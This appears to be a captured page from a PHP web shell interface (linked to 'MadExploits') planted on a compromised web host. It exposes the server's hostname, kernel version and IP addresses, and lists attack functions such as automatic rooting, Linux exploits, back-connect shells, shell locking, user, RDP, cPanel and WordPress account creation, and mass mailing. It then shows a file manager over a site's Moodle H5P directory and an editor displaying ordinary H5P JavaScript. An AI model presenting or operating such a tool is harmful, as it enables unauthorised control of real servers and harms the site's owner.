Linux aries.aptans.com 4.18.0-348.20.1.lve.1.el8.x86_64 #1 SMP Wed Mar 16 08:45:39 EDT 2022 x86_64
Apache
: 135.181.142.107 | : 162.158.152.158
Cant Read [ /etc/named.conf ]
7.4.33
aja
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
aja /
public_html /
ead /
mod /
hvp /
library /
js /
[ HOME SHELL ]
Name
Size
Permission
Action
settings
[ DIR ]
drwxr-xr-x
h5p-action-bar.js
2.66
KB
-rw-r--r--
h5p-confirmation-dialog.js
11.86
KB
-rw-r--r--
h5p-content-type.js
1.26
KB
-rw-r--r--
h5p-content-upgrade-process.js
9.35
KB
-rw-r--r--
h5p-content-upgrade-worker.js
1.47
KB
-rw-r--r--
h5p-content-upgrade.js
11.29
KB
-rw-r--r--
h5p-data-view.js
11.95
KB
-rw-r--r--
h5p-display-options.js
1.28
KB
-rw-r--r--
h5p-embed.js
1.93
KB
-rw-r--r--
h5p-event-dispatcher.js
6.29
KB
-rw-r--r--
h5p-hub-registration.js
161.72
KB
-rw-r--r--
h5p-hub-sharing.js
235.33
KB
-rw-r--r--
h5p-library-details.js
10.7
KB
-rw-r--r--
h5p-library-list.js
4.22
KB
-rw-r--r--
h5p-resizer.js
3.57
KB
-rw-r--r--
h5p-utils.js
12.51
KB
-rw-r--r--
h5p-version.js
926
B
-rw-r--r--
h5p-x-api-event.js
8.55
KB
-rw-r--r--
h5p-x-api.js
3.64
KB
-rw-r--r--
h5p.js
85.76
KB
-rw-r--r--
jquery.js
88.08
KB
-rw-r--r--
request-queue.js
11.41
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : h5p-library-list.js
/* global H5PAdminIntegration H5PUtils */ var H5PLibraryList = H5PLibraryList || {}; (function ($) { /** * Initializing */ H5PLibraryList.init = function () { var $adminContainer = H5P.jQuery(H5PAdminIntegration.containerSelector).html(''); var libraryList = H5PAdminIntegration.libraryList; if (libraryList.notCached) { $adminContainer.append(H5PUtils.getRebuildCache(libraryList.notCached)); } // Create library list $adminContainer.append(H5PLibraryList.createLibraryList(H5PAdminIntegration.libraryList)); }; /** * Create the library list * * @param {object} libraries List of libraries and headers */ H5PLibraryList.createLibraryList = function (libraries) { var t = H5PAdminIntegration.l10n; if (libraries.listData === undefined || libraries.listData.length === 0) { return $('<div>' + t.NA + '</div>'); } // Create table var $table = H5PUtils.createTable(libraries.listHeaders); $table.addClass('libraries'); // Add libraries $.each (libraries.listData, function (index, library) { var $libraryRow = H5PUtils.createTableRow([ library.title, '<input class="h5p-admin-restricted" type="checkbox"/>', { text: library.numContent, class: 'h5p-admin-center' }, { text: library.numContentDependencies, class: 'h5p-admin-center' }, { text: library.numLibraryDependencies, class: 'h5p-admin-center' }, '<div class="h5p-admin-buttons-wrapper">' + '<button class="h5p-admin-upgrade-library"></button>' + (library.detailsUrl ? '<button class="h5p-admin-view-library" title="' + t.viewLibrary + '"></button>' : '') + (library.deleteUrl ? '<button class="h5p-admin-delete-library"></button>' : '') + '</div>' ]); H5PLibraryList.addRestricted($('.h5p-admin-restricted', $libraryRow), library.restrictedUrl, library.restricted); var hasContent = !(library.numContent === '' || library.numContent === 0); if (library.upgradeUrl === null) { $('.h5p-admin-upgrade-library', $libraryRow).remove(); } else if (library.upgradeUrl === false || !hasContent) { $('.h5p-admin-upgrade-library', $libraryRow).attr('disabled', true); } else { $('.h5p-admin-upgrade-library', $libraryRow).attr('title', t.upgradeLibrary).click(function () { window.location.href = library.upgradeUrl; }); } // Open details view when clicked $('.h5p-admin-view-library', $libraryRow).on('click', function () { window.location.href = library.detailsUrl; }); var $deleteButton = $('.h5p-admin-delete-library', $libraryRow); if (libraries.notCached !== undefined || hasContent || (library.numContentDependencies !== '' && library.numContentDependencies !== 0) || (library.numLibraryDependencies !== '' && library.numLibraryDependencies !== 0)) { // Disabled delete if content. $deleteButton.attr('disabled', true); } else { // Go to delete page om click. $deleteButton.attr('title', t.deleteLibrary).on('click', function () { window.location.href = library.deleteUrl; }); } $table.append($libraryRow); }); return $table; }; H5PLibraryList.addRestricted = function ($checkbox, url, selected) { if (selected === null) { $checkbox.remove(); } else { $checkbox.change(function () { $checkbox.attr('disabled', true); $.ajax({ dataType: 'json', url: url, cache: false }).fail(function () { $checkbox.attr('disabled', false); // Reset $checkbox.attr('checked', !$checkbox.is(':checked')); }).done(function (result) { url = result.url; $checkbox.attr('disabled', false); }); }); if (selected) { $checkbox.attr('checked', true); } } }; // Initialize me: $(document).ready(function () { if (!H5PLibraryList.initialized) { H5PLibraryList.initialized = true; H5PLibraryList.init(); } }); })(H5P.jQuery);
Close